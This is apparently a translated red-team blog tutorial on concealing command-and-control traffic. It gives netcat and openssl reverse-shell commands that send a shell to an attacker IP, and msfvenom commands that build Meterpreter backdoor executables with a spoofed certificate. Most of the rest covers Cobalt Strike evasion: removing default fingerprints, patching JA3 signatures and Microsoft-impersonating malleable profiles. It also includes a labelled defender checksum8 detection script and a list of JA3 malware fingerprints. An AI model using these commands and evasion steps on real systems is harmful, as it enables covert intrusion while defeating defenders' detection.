Red Team APT - Traffic Hiding & C2 Tools & Encrypted Data & Certificate Fingerprints & Algorithm Paths & Profile Rules & Packet Features

Ethan医生 · 4 weeks ago · Information Gathering · 52


# Red Team APT - Traffic Hiding - C2 Certificates & Feature Analysis

1. Certificate-related:

# NC - Unencrypted vs. Encrypted - Packet Capture Comparison

Unencrypted (plain netcat; the shell traffic is readable in a capture):

nc -lvvp 5566

nc -e /bin/bash 192.168.1.5 5566

Encrypted (openssl s_server / s_client). Generate a self-signed certificate on the attacker side:

openssl req -x509 -newkey rsa:2048 -keyout key.pem -out cert.pem -days 365 -nodes

Listen on the chosen port on the attacker machine (here I chose 8888; the command below uses 5566):

openssl s_server -quiet -key key.pem -cert cert.pem -port 5566

Run the reverse shell command on the victim machine (change the IP and port to yours):

mkfifo /tmp/s; /bin/sh -i < /tmp/s 2>&1 | openssl s_client -quiet -connect 192.168.1.5:5566 > /tmp/s;

 

# MSF - Unencrypted vs. Encrypted - Packet Capture Comparison

HTTP packet characteristics (reverse_http):

msfvenom -p windows/meterpreter/reverse_http LHOST=192.168.139.131 LPORT=5566 -f exe -o http.exe

HTTPS certificate characteristics (reverse_https):

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.139.131 LPORT=5566 -f exe -o https.exe

Custom SSL certificate:

1. Generate the certificate with openssl:

openssl req -new -newkey rsa:4096 -days 365 -nodes -x509 -subj "/C=UK/ST=xiaodi/L=xiaodi/O=Development/CN=www.baidu.com" -keyout www.baidu.com.key -out www.baidu.com.crt && cat www.baidu.com.key www.baidu.com.crt > www.baidu.com.pem && rm -f www.baidu.com.key www.baidu.com.crt

2. Generate the MSF backdoor bound to that certificate:

msfvenom -p windows/meterpreter/reverse_https LHOST=192.168.139.131 LPORT=5566 PayloadUUIDTracking=true PayloadUUIDName=Whoamishell HandlerSSLCert=/root/www.baidu.com.pem StagerVerifySSLCert=true -f exe -o https-b.exe

3. Start the MSF listener and wait for the session:

use exploit/multi/handler
set payload windows/meterpreter/reverse_https
set lhost 0.0.0.0
set lport 5566
set HandlerSSLCert /root/www.baidu.com.pem
set StagerVerifySSLCert true
run

# CS - Unencrypted vs. Encrypted - Packet Capture Comparison

HTTP packet characteristics (controlled by the C2 profile):

Default User-Agent header

URL path algorithm (checksum8)

POST request path

.............

public class EchoTest {

    // Cobalt Strike's checksum8: strip slashes, sum the character codes, mod 256.
    // The default (profile-less) stager URI is a random string generated so that
    // this value is 92 for the x86 stager and 93 for the x64 stager, which is
    // what makes the algorithm usable as a detection feature.
    public static long checksum8(String text) {
        if (text.length() < 4) {
            return 0L;
        }
        text = text.replace("/", "");
        long sum = 0L;
        for (int x = 0; x < text.length(); x++) {
            sum += text.charAt(x);
        }
        return sum % 256L;
    }

    public static void main(String[] args) throws Exception {
        System.out.println(checksum8("jquery-3.3.2.slim.min.js"));
    }
}
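A defender-side use of the same algorithm, as an added example that is not part of the original post: a Python port of checksum8 run over constructed proxy log lines, flagging request paths whose checksum is 92 (x86 stager) or 93 (x64 stager), the values Cobalt Strike's default staging URIs are generated to satisfy. The log format and the sample lines are constructed for this example.

```python
import re

# Values Cobalt Strike's default (profile-less) staging URIs are generated to
# satisfy; a URI set explicitly in a Malleable profile need not match them.
STAGER_X86 = 92
STAGER_X64 = 93

def checksum8(text):
    """Python port of the checksum8 logic from the Java snippet above."""
    if len(text) < 4:
        return 0
    text = text.replace("/", "")
    return sum(ord(c) for c in text) % 256

def classify_uri(uri):
    """Return 'x86-stager', 'x64-stager' or None for a request URI."""
    path = uri.split("?", 1)[0]        # the checksum is computed over the path only
    value = checksum8(path)
    if value == STAGER_X86:
        return "x86-stager"
    if value == STAGER_X64:
        return "x64-stager"
    return None

# Constructed log format (not a real proxy format): "<src_ip> <method> <uri> <user-agent>"
LOG_LINE = re.compile(r"^(?P<src>\S+) (?P<method>[A-Z]+) (?P<uri>\S+) (?P<ua>.*)$")

# Constructed sample lines: "/sW9Y" sums to 92 and "/vJ2k" to 93 by construction.
SAMPLE_LOG = [
    "10.0.0.7 GET /index.html Mozilla/5.0",
    "10.0.0.7 GET /jquery-3.3.2.slim.min.js Mozilla/5.0",
    "10.0.0.9 GET /sW9Y Mozilla/5.0 (Windows NT 6.1)",
    "10.0.0.9 GET /vJ2k?cb=1 Mozilla/5.0 (Windows NT 6.1)",
]

def scan_log(lines):
    """Return (src, uri, kind) for every request whose path matches a stager checksum."""
    hits = []
    for line in lines:
        m = LOG_LINE.match(line)
        if not m:
            continue
        kind = classify_uri(m["uri"])
        if kind:
            hits.append((m["src"], m["uri"], kind))
    return hits

if __name__ == "__main__":
    for src, uri, kind in scan_log(SAMPLE_LOG):
        print(f"{src} requested {uri}: {kind}")
```

A match on the checksum alone is a weak indicator (one path in 256 collides), so it is best combined with the User-Agent and POST-path features listed above.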

 

 

HTTPS certificate characteristics:

JA3/JA3S (the client and server TLS fingerprints are removed by patching the tool):

https://mp.weixin.qq.com/s/pZiP_f7sL2mVC8nIfxtNzg

Some known JA3/JA3S fingerprint combinations:

https://github.com/ByteSecLabs/ja3-ja3s-combo/blob/master/master-list.txt

TrickBOT;(ja3:6734f37431670b3ab4292b8f60f29984 AND ja3s:623de93db17d313345d7ea481e7443cf)

Emotet;(ja3:4d7a28d6f2263ed61de88ca66eb011e3 AND ja3s:80b3a14bccc8598a1f3bbe83e71f735f)

IceD;(ja3:4d7a28d6f2263ed61de88ca66eb011e3 AND ja3s:80b3a14bccc8598a1f3bbe83e71f735f)

Tor;(ja3:e7d705a3286e19ea42f587b344ee6865 AND ja3s:a95ca7eab4d47d051a5cd4fb7b6005dc)

Metasploit;(ja3:72a589da586844d7f0818ce684948eea AND ja3s:70999de61602be74d4b25185843bd18e) OR (ja3:a0e9f5d64349fb13191bc781f81f42e1 AND ja3s:70999de61602be74d4b25185843bd18e)

CobaltStrike;(ja3:72a589da586844d7f0818ce684948eea AND ja3s:b742b407517bac9536a77a7b0fee28e9) OR (ja3:a0e9f5d64349fb13191bc781f81f42e1 AND ja3s:b742b407517bac9536a77a7b0fee28e9)

Empire;(ja3:db42e3017c8b6d160751ef3a04f695e7 AND ja3s:e35df3e00ca4ef31d2b34bebaa2f862)

 

Algorithm analysis (extracting JA3/JA3S from a capture):

https://github.com/Macr0phag3/ja3box

python ja3box.py -f https.pcap

Common features:

1. Change the default port (must be changed):

Edit the teamserver file and change the server port value (50000).

2. Remove the default keystore certificate fingerprint (must be changed):

View the certificate fingerprint: keytool -list -v -keystore cobaltstrike.store

Generate a new certificate (with its own fingerprint): keytool -keystore cobaltstrike1.store -storepass 123456 -keypass 123456 -genkey -keyalg RSA -alias xiaodi8.com -dname "CN=xiaodi8 e-Szigno Root CA, OU=e-Szigno CA, O=xiaodi8 Ltd., L=Budapest, S=HU, C=HU"

Apply the new certificate (convert the keystore to PKCS12): keytool -importkeystore -srckeystore cobaltstrike1.store -destkeystore cobaltstrike1.store -deststoretype pkcs12

3. Remove traffic/communication features:

Profile resources:

https://github.com/xx0hcd/Malleable-C2-Profiles

https://github.com/FortyNorthSecurity/C2concealer

https://github.com/threatexpress/malleable-c2

https://github.com/zer0yu/Awesome-CobaltStrike?tab=readme-ov-file#0x02-c2-profiles

1. Create the C2 profile file: xiaodi.Profiles

2. Write the communication rules into it: User-Agent header, GET, POST, heartbeat (sleep), certificate, etc.

3. Check that the profile is valid: ./c2lint xiaodi.Profiles

4. Start the teamserver with the profile loaded: ./teamserver <ip> <password> xiaodi.Profiles

https-certificate {
    set CN "xiaodi8";
    set O "Microsoft";
    set C "en";
    set L "US";
    set OU "Microsoft";
    set ST "US";
    set validity "365";
}

# Settings: change these to your keystore name and keystore password
code-signer {
    set keystore "xiaodi.store";
    set password "xiaodi";
    set alias "xiaodi8.com";
}

2. IP and communication-related:

....................

Tags: Red Team APT
